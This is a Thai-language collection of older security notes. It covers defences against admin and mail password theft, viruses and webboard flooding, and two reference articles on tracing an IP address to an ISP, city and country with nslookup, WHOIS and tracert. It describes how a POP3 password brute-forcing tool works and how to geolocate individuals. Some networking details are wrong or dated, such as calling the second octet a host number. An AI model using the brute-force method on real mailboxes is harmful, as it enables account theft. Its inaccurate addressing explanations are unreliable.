

การป้องกันการขโมย Passwordของ Admin.บนWindowsNT/ 2000

1. ตั้ง Passwordให้ยากๆ

- ตั้งค่าที่ไม่มีใน Dictionary

- ใช้อักษรเล็ก / ใหญ่ผสมกับตัวเลข : zE8tH2eF

2. ติดตั้ง Service Pack 3

3. ใช้ Firewall



11. การได้ Password ของe-mail บนMail Server

SMTP Server = มีหน้าที่ให้user ส่งe-mailโดยตรง

POP3 Server = มีหน้าที่ให้user รับe-mail ด้วยProtocol POP3

IMAP Server = มีหน้าที่ให้user รับe-mail ด้วยProtocol IMAP

- กรณีใช้POP3 Server เมื่อเตรียม File UserและPassword พร้อมแล้ว ก็run Prog. p3x โดย p3x

จะ ส่งPassword ไปที่Mail Serverทีละตัวเพื่อตรวจสอบ หากไม่ใช่จะส่งError Message กลับมาให้p3k ทำให้p3k นั้นทราบว่าPassword ไม่ใช่ก็จะเอาตัวต่อไปมาอีก ทำซ้ำกันไปเรื่อยๆจนกว่าจะถูกทดสอบจนหมด หากใช่ Passwordที่ถูกต้อง จะปรากฎOK Mailbox Open

- เมื่อได้เปิ[คำไม่พึงประสงค์]่านแล้ว mailนั้นจะถูกลบทิ้งไป ต่างกับ IMAP แม้mail จะถูกอ่านแล้วก็ยังคงmail

ไว้ในServer

การป้องกันการขโมย Password ของe-mail จากการใช้Tools

1. ตั้ง Password ของuserให้ยากๆ เช่นตั้งว่า ฉันรักเธอ เมื่อกดในkeyboard จะได้

Password = CyoiydgTv

2. ตั้งค่าที่POP 3 Server เมื่อมีการส่งค่าPassword ที่ผิดติดต่อกัน 3 ครั้งให้Server ทำการ

Disconnect



12. การป้องกันCom. ให้พ้นภัยจากVirus

1. ติดตั้ง Anti –Virus

2. ไม่ run Prog. ที่มากับe-mail

3. ติดตามข่าวสารเกี่ยวกับVirus พันธุ์ใหม่ๆและวิธีป้องกันจากWebsiteด้านความปลอดภัย

- www.thaicert.nectec.or.th - www.symantec.com - www.mcafee.com


13. การป้องกันการBomb Webboard

1. ตรวจหัวข้อของกระทู้ว่าซ้ำ ?

- จะมีลักษณะที่เป็นข้อความซ้ำๆเหมือนเดิม (เหมือน Bomb e-mail)

- Web Masterควรเพิ่ม codeเพื่อใช้ในการตรวจสอบ/รับข้อมูลเพียงครั้งเดียว (ข้อความที่ส่ง

มาครั้งแรก)

2. ถ้ามาจาก IPเดิมให้ Postได้นาทีละ 1กระทู้

- ปกติการตั้งกระทู้จะใช้เวลา มากกว่า 1นาที

3. ตรวจสอบว่าเป็นข้อความที่ถูกสร้างโดยมนุษย์ / COM.

Web Programmer ควรปฎิบัติดังนี้

- ข้อความที่อ่านไม่รู้เรื่องตัดทิ้งไป

- ใช้วิชา AIเข้ามาช่วย



14. การป้องกันระบบให้พ้นภัยจากเครื่องมือHackใหม่ๆ

1. เปิดเฉพาะ serviceที่จำเป็น

2. ลบ userที่เป็นdefaultของระบบที่ไม่จำเป็นทิ้งไป

- จะมาพร้อมกับการติดตั้งระบบใหม่ๆ

3. ใช้ Firewall

- กำหนดAccess Rule ที่เหมาะสม

- สามารถใช้ Linux Redhat 8.0 ซึ่งมี IPTABLE ซึ่งเป็น Firewallใช้ฟรี

โดยไม่ต้องลงทุนซื้อ Firewall(เพียงแค่หา Com.รุ่น Pentium 2,3)

4. ติดตั้ง IDS

- มีทั้ง H/W ,S/W (Black ICE)

- สำหรับNetwork ควรมี NIDS (Network Intrusion Detection Systems)

- ควรติดตั้งที่

1.หน้า Firewall :ตรวจจับ Trafficที่น่าสงสัย

2.หลัง Firewall :ตรวจจับ Trafficที่แปลกปลอมผ่านFirewall

3.ที่ Network ในกลุ่มServer (DMZ)


เอกสารอ้างอิง

ตามรอย ด้วย tracert2

บางครั้งเมื่อเราเห็น***พีแอดเดรสแล้วทำให้เราสงสัยและอยากรู้ข้อมูลที่มากขึ้นของใครบางคนหรือโฮสต์บางโฮสต์
แต่เราจะใช้***พีแอดเดรสนั้นเพื่อหาข้อมูลที่มากกว่า เช่น หาที่ตั้งของคอมพิวเตอร์ของ***พีนั้นได้อย่างไร
บทความเรื่องนี้จะตอบคำถามเหล่านี้ ที่จริงแล้ว ***พีแอดเดรส (จริง ๆ แล้วทั้ง TCP/IP Protocol) ถูกกำหนดโครงสร้างหรือการออกแบบที่ไม่สามารถ บอกได้ว่าระบบที่มี***พีนั้นตั้งอยู่ที่ประเทศใหน ถ้าเราดูอย่างง่าย ๆ จะเห็นได้ว่า***พีแอดเดรสไม่มีส่วนที่บอกได้ว่า คอมพิวเตอร์ที่ใช้***พีนั้นมาจากประเทศใหน ดังนั้นการเข้าใจว่าส่วนที่สองหรือสามของ***พีจะหมายถึงประเทศที่ระบบนั้น ใช้ นั้นไม่ถูกต้อง อย่างไรก็ตาม บางครั้งก็สามารถเดาหรือหามาได้ว่าอยู่ที่ประเทศใหนหรือแม้แต่กระทั่งบอก เมืองที่ตั้งอยู่นั้น โดยการดูจากสามส่วนแรกของ***พี เรามาดูตัวอย่างเพื่อจะให้เข้าใจว่าที่ผมกล่าวไปนั้นหมายถึงอะไร ก่อนที่จะ ไปดูที่ตัวอย่างเรามาทำความเข้าใจกันก่อนว่าจริง ๆ แล้วมีการให้***พีแอดเดรสกับคุณได้อย่างไร


ขั้นแรก
ผู้ให้บริการอินเตอร์เน็ต(ISP)ของคุณจะต้องไปขอ***พีจากส่วนกลางที่รับผิดชอบและได้***พีแอดเดรสที่
อยู่ในช่วงหนึ่งซึ่งจะให้ไปแก่สมาชิก (ที่โทรศัพท์เข้ามายังเซิร์ฟเวอร์)ไปอีกต่อหนึ่ง ***เอสพีส่วนมากจะได้
network address เป็น Class C ซึ่งประกอบไปด้วย Network Prefix 24 บิต (สามส่วนแรกของ***พี) และ Host number 8 บิต (ส่วนสุดท้าย) ถูกเรียกเป็น "24's" และใช้โดยทั่วไปโดย***เอสพีส่วนใหญ่
ในโลกแห่งความเป็นจริง ทุก ๆ คนจะมีที่อยู่บ้านของตัวเองหรือหมายเลขโทรศัพท์ เพื่อให้เขาสามารถติดต่อ ได้โดยหมายเลขหรือที่อยู่นั้น เช่นเดียวกันกับคอมพิวเตอร์ที่ต่อเข้ากับอินเตอร์เน็ตจะมี Internet Protocol ที่เป็นของตัวเอง หรือ***พีแอดเดรสที่สามารถใช้เพื่อติดต่อกับคอมพิวเตอร์เครื่องนั้น ในภาษาของนักคอมพิวเตอร์ตัวยง ***พีแอดเดรสหนึ่ง ๆ จะเป็นสัญลักษณ์เลขฐานสิบที่แบ่งที่อยู่ทางอินเตอร์เน็ตขนาด 32 บิตเป็นสี่ส่วน ๆ ละ 8 บิต

***พีแอดเดรสให้ข้อมูลกับเราบ้างหรือไม่ รึว่าตัวเลขนั้นมันหมายถึงอะไร ?
มาดูตัวอย่างของ***พีแอดเดรสต่อไปนี้:
202.144.49.110

ในส่วนแรก ตัวเลขก่อนเลขฐานสิบตัวแรก เช่น 202 เป็น Network number หรือ Network Prefixหมายถึงมันจะระบุถึงหมายเลขของเน็ตเวิร์คที่เป็นโฮสต์นั้น
ส่วนที่สองเช่น 144 เป็น Host number
ที่บอกถึงหมายเลขของโฮสต์ที่อยู่ภายในเน็ตเวิร์ค ดังนั้น ถ้าคอมพิวเตอร์อยู่ในเน็ตเวิร์คเดียวกับก็จะมี Network number เหมือนกัน เพื่อให้เกิดความยืดหยุ่นกับขนาดของเน็ตเวิร์คดังนั้นจึงมี***พีแอดเดรสหลาย class ที่แตกต่างกัน:
Address Class Dotted Decimal Notation Ranges
Class A (/8 Prefixes) 1.xxx.xxx.xxx ถึง 126.xxx.xxx.xxxClass B ( /16 Prefixes) 128.0.xxx.xxx ถึง 191.255.xxx.xxxClass C ( /24 Prefixes) 192.0.0.xxx ถึง 223.255.255.xxx

class A Network Address จะประกอบด้วย Network Prefix 8 บิต ตามด้วย Host
number 24 บิต เรียกว่า "/8"s" หรือ "8's" เพราะว่ามันมี Network prefix ขนาด 8 บิต ส่วน class B Network Address มี Network Prefix ขนาด 16 บิตตามด้วย Host number 16 บิต เรียกว่า "16's" ใน class C Network Address มี Network Prefix ขนาด 24 บิต และ Host number 8 บิต เรียกว่า "24's" และมักจะใช้กันโดย***เอสพีต่าง ๆ เนื่องจากขนาดที่เติบโตขึ้นเรื่อย ๆ ของเครือข่ายอินเตอร์เน็ต ผู้บริหารเน็ตเวิร์คต่าง ๆ จึงเจอปัญหาหลายอย่าง ตารางเส้นทางการติดต่อบนอินเตอร์เน็ตเริ่มโตขึ้นและผู้บริหารระบบจำเป็นต้อง ร้องขอ Network number
จากอินเตอร์เน็ตอีกก่อนที่จะมีเน็ตเวิร์คใหม่ในไซต์ของพวกเขา จึงทำให้เกิด subnet ขึ้นมา ถ้า***เอสพีของคุณมีขนาดใหญ่และให้บริการ***พีแบบ dynamic IP address คุณจะสังเกตเห็นได้ว่าเมื่อใด ก็ตามที่คุณล๊อกออนเข้าอินเตอร์เน็ต ***พีแอดเดรสของคุณจะมี 24 บิตแรกที่เหมือนกันแต่มีเพียง 8 บิต สุดท้ายเท่านั้นที่เปลี่ยนไป เนื่องจากการนำ subnet มาใช้ ดังนั้น***พีแอดเดรสจึงมีลักษณะดังนี้:
xxx.xxx.zzz.yyy
สองส่วนแรกเป็น Network Prefix number, zzz เป็น Subnet number และ yyy คือ Host number ดังนั้นคุณจึงเชื่อมต่ออยู่กับ subnet เดิมทุกครั้งในเน็ตเวิร์คเดียวกัน ด้วยเหตุนี้สามส่วนแรกจึงยังเหมือนเดิม มีเพียงส่วนท้ายสุด เช่น yyy เท่านั้นที่ไม่แน่นอน เช่น ถ้า***เอสพี xyz ได้***พี 203.98.12.xx มา ดังนั้นคุณสามารถที่จะมี***พีใด ๆ ก็ตามที่สามส่วนแรกเป็น 203.98.12. แต่ละ***เอสพีมี***พีอยู่ในช่วงหนึ่งซึ่งจะจัดสรรให้กับสมาชิกทุกคน หรือ สมาชิกทุกคนที่เชื่อมต่อกับอินเตอร์เน็ต
โดยใช้***เอสพีเดียวกันก็จะมี***พีอยู่ในช่วงนี้ด้วย จึงมีผลทำให้ทุกคนที่ใช้***เอสพีเดียวกันมีแนวโน้มที่จะมี***พี แอดเดรสที่มีสามส่วนแรกเหมือนกัน ถ้าคุณค้นคว้าหาข้อมูลอย่างจริงจัง คุณสามารถบอกได้ว่า***เอสพีไหนที่คนนั้นกำลังใช้อยู่อย่างง่าย ๆ โดยดูจาก ***พีของเขาเอง แล้วชื่อของ***เอสพีนั้นสามารถใช้เพื่อบอกเมืองและประเทศของบุคคลนั้น
ลองมาดูที่ตัวอย่าง: ในประเทศของผม มี***เอสพีรายใหญ่สามราย:

ISP Name Network Address Allotted
ISP I 203.94.47.xxISP II 202.92.12.xxISP III 203.91.35.xx

ถึงตอนนี้ ถ้าผมรู้จักเพื่อนทางอินเตอร์เน็ตและรู้***พีว่า***พีของเขาคือ:
203.91.35.12 ผมสามารถค้นหาได้อย่างง่ายดายว่าเขาใช้ ***เอสพี III เพื่อเชื่อมต่อกับอินเตอร์เน็ต ถูกไหม ? คุณอาจพูดว่าใคร ๆ ก็ทำอย่างนี้ ได้ เอาละ คำตอบคือใช่และไม่ใช่ คุณจะเห็นได้ว่าวิธีการข้างต้นนี้หา***เอสพีได้สำเร็จเพราะว่าเรามีรายการ ของ ***เอสพีและ Network Address แล้วเท่านั้น
ดังนั้นตามความเห็นของผมวิธีการข้างต้นทำสำเร็จก็ต่อเมื่อได้ค้นคว้าและ ทดลองอย่างหนักแล้วเท่านั้น อย่างไรก็ตามการค้นคว้าอย่างนี้ก็มีประโยชน์ในบางครั้งเช่นกันคุณใช้วิธี ข้างต้นไม่ได้แน่นอนถ้ามี***พีแอดเดรสและรายการของ***เอสพีจำนวนมาก ถ้า***พีนั้นเป็นของใครบาง


คนที่อยู่ในกระท่อมของชาวเอสกิโมที่ขั้วโลกเหนือล่ะ ?
คงเป็นไปไม่ได้ที่คุณจะมีรายการของ Network Address ของ***เอสพีทุกรายทั่วโลกเป็นแน่ ใช่มั้ย ?
ข้อสังเกต: ในกรณีข้างต้น
คุณสามารถรู้เมืองที่ระบบคอมพิวเตอร์นั้นตั้งอยู่ได้ด้วยโดยใช้***พี
เพราะว่า***เอสพี ส่วนใหญ่จะใช้ Network Address ที่แตกต่างกันในเมืองต่าง ๆ ด้วย นอกจากนี้***เอสพีบางรายก็ดำเนินงาน อยู่ในเพียงเมือง ๆ เดียว ดังนั้น


มีวิธีที่ดีกว่าในการหาสถานที่ตั้งของ***พีนั้นมั้ย ?
แน่นอน โดยการใช้วิธี DNS lookup
DNS lookup เปลี่ยนจาก hostname เป็น***พีแอดเดรส ส่วน Reverse DNS Lookup
ก็เปลี่ยนจาก ***พีแอดเดรสมาเป็น hostname ซึ่งจะบอกชื่อของระบบที่อยู่***งไกลเป็นตัวอักษรและตัวเลขและจุด เช่น
mail2.nol.net.in เป็นชื่อ hostname โดย 203.45.67.98 ไม่ใช่ hostname
โปรแกรมยูทิลิตี้สำหรับยูนิกซ์ซึ่งทำงานได้ดีมากและนิยมใช้กันคือ
'nslookup' สามารถใช้เพื่อ Reverse DNS lookup
ดังนั้นถ้าคุณมีเครื่องคอมพิวเตอร์ที่ใช้ระบบปฏิบัติการยูนิกซ์หรือคุณสามารถใช้งานมันได้
ขั้นแรกคุณต้องหาว่าคำสั่ง nslookup อยู่ตรงไหนโดยการใช้คำสั่งต่อไปนี้:
' whereis nslookup '
เมื่อคุณรู้ว่ายูทิลิตี้นี้อยู่ที่ไหนในระบบแล้วคุณก็สามารถใช้เพื่อ แปลง***พีให้เป็นhostnameและในทางกลับกันได้แล้ว ดังตัวอย่างต่อไปนี้
$>nslookup IP Address
เราพิมพ์***พีแอดเดรสลงไป ในที่นี้เราพิมพ์ 203.94.12.01
(ซึ่งเป็น***พีที่ผมต้องการหา)
$>nslookup 203.94.12.01
คุณจะเห็นผลลัพธ์ออกมาเป็น: mail2.nol.net.in ในตอนนี้ถ้าคุณดูที่ชื่อ hostname ที่เปลี่ยนมาจาก***พีแอดเดรสอย่างตั้งใจ จะเห็นได้ว่าส่วนหลังสุดจะบอกถึง ประเทศที่ระบบนั้นตั้งอยู่ จากตัวอย่างคุณเห็น '.in' ซึ่งบอกว่าระบบนี้อยู่ในประเทศอินเดีย ทุกประเทศมีรหัสประเทศของตัวเองซึ่งจะเห็นได้บ่อยมากกว่าชื่อท้ายสุดที่ไม่ ใช่รหัสประเทศ วิธีนี้สามารถใช้เพื่อค้นหาว่าคน ๆ นั้น
อยู่ในประเทศใหนถ้าคุณรู้อีเมลของเขา เช่น ถ้าคนนั้นมีที่อยู่อีเมลลงท้ายด้วย .ph แสดงว่าเขาอาจจะอาศัยอยู่ใน ประเทศฟิลิปปินส์และถ้าลงท้ายด้วย .il เขาอยู่ในประเทศอิสราเอล ประเทศอื่น ๆ ก็ทำนองเดียวกันนี้ รหัสประเทศ โดยทั่ว ๆ ไปเช่น:
ประเทศ รหัสประเทศ

ออสเตรเลีย .au
อินโดนีเซีย .id
อินเดีย .in
ญี่ปุ่น .jp
อิสราเอล .il
สหราชอาณาจักร .uk

รายการรหัสประเทศที่ครบสมบูรณ์ดูได้ที่:
http://www.alldomains.com/
http://www.iana.org/domain-names.html
รายการรหัสรัฐต่าง ๆ ของสหรัฐ ฯ ดูที่: http://www.usps.gov/ncsc/lookups/abbr_state.txt
ผู้ที่ใช้วินโดวส์สามารถแปลง***พีให้เป็น hostname ได้โดยการดาวน์โหลดยูทิลิตี้ที่ชื่อ Samspade จาก http://www.samspade.com/

อีกวิธีการหนึ่งที่ใช้หาที่อยู่ทางภูมิศาสตร์ของระบบคอมพิวเตอร์ที่ตรงจุดจริง ๆ คือการใช้ ฐานข้อมูล WHOIS
เป็นฐานข้อมูลหลักที่ประกอบด้วยข้อมูลหลากหลายเช่นข้อมูลสำหรับการ ติดต่อ ชื่อ ผู้ที่เป็นเจ้าของโดเมนนั้น หาข้อมูลโดยการใส่ hostname ลงไป แล้วบริการนี้จะบอกข้อมูลที่อยู่ในฐานข้อมูลออกมา
วิธีนี้สามารถใช้เพื่อหาข้อมูลที่ถูกต้องเกี่ยวกับ***พีหรือ hostname
ที่ต้องการ อย่างไรก็ตามมันอาจจะไม่มี ประโยชน์ถ้าคุณพยายามหาสถานที่ตั้งที่แท้จริงของผู้ใช้***พีแบบ dynamic IP
แต่อย่างน้อยวิธีนี้สามารถใช้ เพื่อหาเมืองที่***เอสพีนั้นอยู่ได้ คุณสามารถใช้บริการ WHOIS ที่ http://www.alldomains.com/
นอกจากนี้คุณสามารถป้อนชื่อ hostname เข้าไปในบราวเซอร์ของคุณเพื่อใช้บริการ WHOIS โดยใช้ URL นี้:
http://205.177.25.9/cgi-bin/whois?abc.com โดยเปลี่ยนชื่อ abc.com
เป็นชื่อโดเมนที่คุณต้องการถามข้อมูลโดยใช้ WHOIS วิธีนี้ไม่สามารถใช้เพื่อหาที่อยู่ที่สามารถติดต่อได้ของบุคคลที่ต้องการค้น หาถ้า***พีที่คุณใช้เพื่อหาเขาเป็นของ***เอสพีของเขา ดังนั้นคุณจำเป็นต้องรู้ชื่อโดเมน(ซึ่งลงทะเบียนโดยใช้ชื่อของเขา)
หรือไม่ก็รู้ได้เพียงแต่เมือง (และ***เอสพี) ที่ใช้โดยบุคคลนั้น ถ้าบุคคลนั้นลงทะเบียนชื่อโดเมนและคุณต้องการใช้มันเพื่อค้นหาว่าเขาอยู่ใน เมืองไหน
สิ่งที่ควรสังเกตในกรณีนี้ คือถ้าบุคคลนั้นลงทะเบียนชื่อโดเมนที่ใช้บริการฟรี เช่น Namezero.com
ดังนั้นชื่อโดเมนอาจจะลงทะเบียน โดยใช้ชื่อของบริษัทนั้นและไม่ใช่ชื่อของบุคคลที่เราต้องการค้นหา ฉะนั้นการใช้บริการ WHOIS จะให้ข้อมูล เกี่ยวกับ***เอสพีไม่ใช่บุคคลที่เราต้องการค้นหา
ข้อสังเกต: บริการ WHOIS โดยค่าเริ่มต้นจะรันอยู่ที่พอร์ต 43 ของระบบนั้น
ลองใช้บริการโดยการ telnet ไปที่พอร์ต 43 และลองพิมพ์ค้นหา ผมไม่เคยลอง แต่มันต้องสนุกแน่ ๆ
วิธีที่สองที่เป็นวิธีทีมีประสิทธิภาพมาก (หลังจากการถาม Reverse DNS แล้ว)ของการย้อนรอย***พีไปสู่ สถานที่ทางภูมิศาสตร์จริง ๆ ด้วยการใช้ 'traceroute' คำสั่ง 'tracert' หรือ 'traceroute' จะให้ชื่อหรือ***พี ของเส้นทางที่ผ่านก่อนถึงเป้าหมาย ผู้ใช้วินโดวส์สามารถตามรอยของ***พีโดยการพิมพ์คำสั่งต่อไปนี้ที่ดอสพรอมพ์:

C:\windows>tracert IP หรือ Hostname

สำหรับวิธีใช้คำสั่งนี้ พิมพ์ว่า: 'tracert' ที่ดอสพรอมพ์
ต่อมาเรามาดูที่ผลที่ได้เมื่อผมตามรอย***พีของผมเอง โปรดสังเกตว่าผมอยู่ที่เมืองนิวเดลลีในอินเดีย ให้ดูชื่อของ hostname
อย่างละเอียด แล้วคุณจะพบว่ามันได้ เปิดเผยถึงเมืองต่าง ๆ ที่แพ็คเกตผ่าน

C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

ผลลัพธ์ข้างบนแสดงให้เราเห็นถึงเส้นทางที่ข้อมูลได้เดินทางผ่านไปดังนี้:
Netzero (***เอสพีที่ส่งข้อมูลออกไป) ---> Spectranet (A Backbone Provider) ----->New York ISP --->New York Backbone -> Asia --> South Asia -> India Backbone --> New Delhi Backbone--> Another router in New Delhi Backbone ---> New Delhi ISP

แสดงให้เห็นถึงสถานที่อยู่ของผมจริง ๆ ที่เป็น: นิวเดลลี, อินเดีย, เอเชียใต้
บางครั้งการใช้คำสั่ง 'tracert' โดยใช้***พี ไม่ได้ให้ข้อมูลที่เป็นประโยชน์เลย คุณเห็นจากตัวอย่างข้างบนว่า hostname
ได้บอกถึงชื่อเมืองหรือประเทศที่ระบบนั้นตั้งอยู่ อย่างไรก็ตาม ในบางครั้งชื่อ hostname แทบจะไม่ได้บอกอะไรที่เป็นประโยชน์เลย สมมติว่าการตามรอยจบลงที่ hostname abc.com จะทำให้ไม่ชัดเจนและไม่ให้ร่องรอยที่ให้ค้นหาได้เลยว่า ระบบนั้นอยู่ที่ไหน อย่างไรก็ตามคุณสามารถเปิดบราวเซอร์ของคุณขึ้นมาและเปิดไปที่
http://www.abc.com บางที abc.com
อาจจะเป็น***เอสพีและอาจให้ข้อมูลเกี่ยวกับสถานที่ตั้งและเมืองที่*** เอสพีนั้นให้บริการอยู่ คุณก็ยังมีโอกาสที่ดีในการค้นหาเมืองของบุคคลที่เราต้องการ มียูทิลิตี้ที่น่าสนใจมากอยู่โปรแกรมหนึ่งคือ VisualRoute (http://www.visualroute.com/) ที่สามารถ ตามรอย hostname หรือ***พีและแสดงเส้นทางที่แพ็กเกตนั้นเดินทางไปยังเป้าหมายในรูปแผนที่โลก มันมี ประโยชน์มากและบอกถึงข้อมูลบางอย่างที่ดีเยี่ยม แต่บางครั้งมันก็ดูเหมือนไม่ค่อยจะแม่นยำ เว็ปไซต์ของผู้เขียนเรื่องนี้ http://hackingtruths.box.sk/ ถ้าคุณอยากได้คู่มือที่คุณไฝ่ฝันที่เขียนโดย Ankit Fadia ในเมลบอกซ์ของคุณ ก็เพียงแต่สมัคร mailing list ของเขาโดยส่งอีเมลเปล่าไปที่ programmingforhackers-subscribe@egroups.com

ตามรอย ด้วย tracert1

FBI คงไม่ต้องบอกอะไรกันมากมายนะว่ามันคืออะไร ผมรับข่าวมาจากแหล่งข่าวที่ผมเชื่อถือว่า FBI หรือ NSA หรือ หน่วยงานราชการลับของนานาประเทศมีทีม Hacker เป็นของตัวเองมากขึ้นและมีการว่าจ้าง Hacker เพื่อจับผู้ร้ายที่ต้องการเหมือนกับที่บ้านเราตอนกวาดล้างยาบ้านั่นแหละครับ พอจับได้คนนึกก็เอาเป็นข้อมูลเพื่อตามจับ sideline ต่อไป บางคนอาจจะคิดว่า อะไรกัน ผมไม่เห็นจะมีผลงานอะไรกับเขาเลยมาโม้ให้ฟังเพื่อเอาหน้าหรือป่าว ให้ชาวบ้านเขารับรู้ว่าข้าเป็น “ HACKER ” หรือป่าว ? บอกตรงนี้เลยผมไม่เคยเรียกตัวเองว่าตัวเองเป็น HACKER เลยแม้แต่ครั้งเดียว ผมเรียกตัวเองว่าเป็นเพียง “SelfLerner” ผมเพียงแค่นับถือที่ Hacker มีความสามารถเหนือใครๆ คนเพียงคนเดียวสามารถที่จะทำให้คนทั้งองค์กรต้องทึ่งไปเลย เอาละบ่นพอและมาว่ากันต่อเรื่องเดิม
ขั้นแรก เรามาดูกันก่อนว่า IP ที่คุณได้มาใช้นั้นมาได้ยังไง มาดูที่ ISP ก่อนเลย เริ่มแรก ISP ต้องไปขอ IP Address ส่วนกลางและจะได้รับ IP Address มาช่วงหนึ่งซึ่งคุณ ผู้ซึ่งเป็นลูกข่ายก็จะมี IP อยู่ในช่วงที่ ISP ได้มา ซึ่งโดยส่วนมากแล้ว ISP จะได้ IP ใน Class C มา ซึ่งประกอบไปด้วย Network Prefix 24 bit (สามส่วนแรกของ IP ) และ Host number 8 bit ( ส่วนสุดท้าย) ถูกเรียกเป็น 24’s และใช้โดยทั่วไปโดย ISP ส่วนใหญ่

IP Address ให้อะไรกับเราบ้างเราลองมาดูตัวอย่างกันเลยนะคับ
202.144.49.110
202 <<< Network Number มันจะระบุหมายเลขเน็ตเวิร์คที่เป็นโฮส์ตนั้น 144 <<< Host Number หมายเลขของโฮส์ตที่อยู่ภายในเน็ตเวิร์ค ดังนั้น ผู้ที่อยู่ในเน็ตเวิร์คเดียวกันก็จะมี Network Number เหมือนกัน เพื่อให้เกิดความยืดหยุ่นจึงแบ่งเน็ตเวิร์คออกเป็นหลาย ๆ Class ต่างๆกัน Class Range A 0.0.0.0 ถึง 127.255.255.255 B 128.0.0.0 ถึง 191.255.255.255 C 192.0.0.0 ถึง 223.255.255.255 D 224.0.0.0 ถึง 239.255.255.255 E 240.0.0.0 ถึง 255.255.255.255 เนื่อง จากขนาดที่เติบโตขึ้นเรื่อย ๆ ของเครือข่ายอินเตอร์เน็ต ผู้บริหารเน็ตเวิร์คต่าง ๆ จึงเจอปัญหาหลายอย่าง ตารางเส้นทางการติดต่อบนอินเตอร์เน็ตเริ่มโตขึ้น และผู้บริหารระบบจำเป็นต้องร้องขอ Network number จากอินเตอร์เน็ตอีกก่อนที่จะมีเน็ตเวิร์คใหม่ในไซต์ของพวกเขา จึงทำให้เกิด subnet ขึ้นมา ถ้าไอเอสพีของคุณมีขนาดใหญ่และให้บริการไอพีแบบ dynamic IP address คุณจะสังเกตเห็นได้ว่าเมื่อใด ก็ตามที่คุณล๊อกออนเข้าอินเตอร์เน็ต ไอพีแอดเดรสของคุณจะมี 24 บิตแรกที่เหมือนกันแต่มีเพียง 8 บิต สุดท้ายเท่านั้นที่เปลี่ยนไป เนื่องจากการนำ subnet มาใช้ ดังนั้นไอพีแอดเดรสจึงมีลักษณะดังนี้: xxx.xxx.zzz.yyy สองส่วนแรก เป็น Network Prefix number, zzz เป็น Subnet number และ yyy คือ Host number ดังนั้นคุณจึงเชื่อมต่ออยู่กับ subnet เดิมทุกครั้งในเน็ตเวิร์คเดียวกัน ด้วยเหตุนี้สามส่วนแรกจึงยังเหมือนเดิม มีเพียงส่วนท้ายสุด เช่น yyy เท่านั้นที่ไม่แน่นอน เช่น ถ้าไอเอสพี xyz ได้ไอพี 203.98.12.xxx มา ดังนั้นคุณสามารถที่จะมีไอพีใด ๆ ก็ตามที่สามส่วนแรกเป็น 203.98.12.xxx แต่ละ ไอเอสพีมีไอพีอยู่ในช่วงหนึ่ง ซึ่งจะจัดสรรให้กับสมาชิกทุกคน หรือ สมาชิกทุกคนที่เชื่อมต่อกับอินเตอร์เน็ต โดยใช้ไอเอสพีเดียวกันก็จะมีไอพีอยู่ในช่วงนี้ด้วย จึงมีผลทำให้ทุกคนที่ใช้ไอเอสพีเดียวกัน มีแนวโน้มที่จะมีไอพี แอดเดรสที่มีสามส่วนแรกเหมือนกัน ถ้าคุณค้นคว้าหาข้อมูลอย่างจริงจัง คุณสามารถบอกได้ว่าไอเอสพีไหน ที่คนนั้นกำลังใช้อยู่อย่างง่าย ๆ โดยดูจาก ไอพีของเขาเอง แล้วชื่อของไอเอสพีนั้นสามารถใช้เพื่อบอกเมืองและประเทศของบุคคลนั้น ลองมาดูที่ตัวอย่าง: ISP Name Network Address Allotted ISP I 203.94.47.xx ISP II 202.92.12.xx ISP III 203.91.35.xx ถึง ตอนนี้ ถ้าผมรู้จักเพื่อนทางอินเตอร์เน็ต และรู้ไอพีว่าไอพีของเขาคือ: 203.91.35.12 ผมสามารถค้นหาได้อย่างง่ายดายว่าเขาใช้ ไอเอสพี III เพื่อเชื่อมต่อกับอินเตอร์เน็ต ถูกไหม ? คุณอาจพูดว่าใคร ๆ ก็ทำอย่างนี้ ได้ เอาละ คำตอบคือใช่และไม่ใช่ คุณจะเห็นได้ว่าวิธีการข้างต้นนี้หาไอเอสพีได้สำเร็จ เพราะว่าเรามีรายการของ ไอเอสพีและ Network Address แล้วเท่านั้น ดังนั้นตามความเห็นของผมวิธีการข้างต้นทำสำเร็จก็ต่อเมื่อ ได้ค้นคว้าและทดลองอย่างหนักแล้วเท่านั้น อย่างไรก็ตามการค้นคว้าอย่างนี้ก็มีประโยชน์ในบางครั้งเช่นกัน ลองมาคิด ดูเล่นๆ คุณคิดว่าในโลกนี้มี ISP กี่แห่ง ? แล้วคุณรู้จักทุกที่หรือป่าว ? เป็นไปได้ยากจิงไหม? แล้วทีนี้เราจะรู้ได้ไงล่ะว่า IP Address พวกเนี้ย มันอยู่ที่ไหน happy.gif IP Address มันเป็นเลขใช่ไหม ? แล้วทำไมไม่ทำให้มันเป็นตัวหนังสือซะล่ะ happy.gif ด้วยวิธีการใดคงไม่ต้องบอกแหละนะครับ ก้อรู้ๆ กันอยู่ และเมื่อคุณเปลี่ยนมันจากตัวเลขที่ดูไม่ค่อยรู้เรื่องมาเป็นตัวหนังสือได้ แล้ว เคยเห็นอะไรคล้าย ๆ อย่างนี้ไหม ? www.Victim.com.xx ที่ เราสนใจคือ .xx เท่านั้น เราลองดูสิว่ามันคล้ายๆ อะไรข้างหลัง Dictionary ของเราหรือป่าว ( ไม่รู้ Dic ของคุณมีป่าวน่ะ - -‘ แต่ของผมมีน่ะ อิอิ โชคดี ป่ะ) ไอ้ตัวย่อข้างหลังนี่แหละมันจะบอกว่า IP เนี้ยมันอยู่ที่ไหน อย่างเช่น .US .UK .JP .AU ect. มีอีกเยอะเลย ถ้าอยากรู้ว่ามันย่อมาจากอะไรก้อไปดูได้ที่ 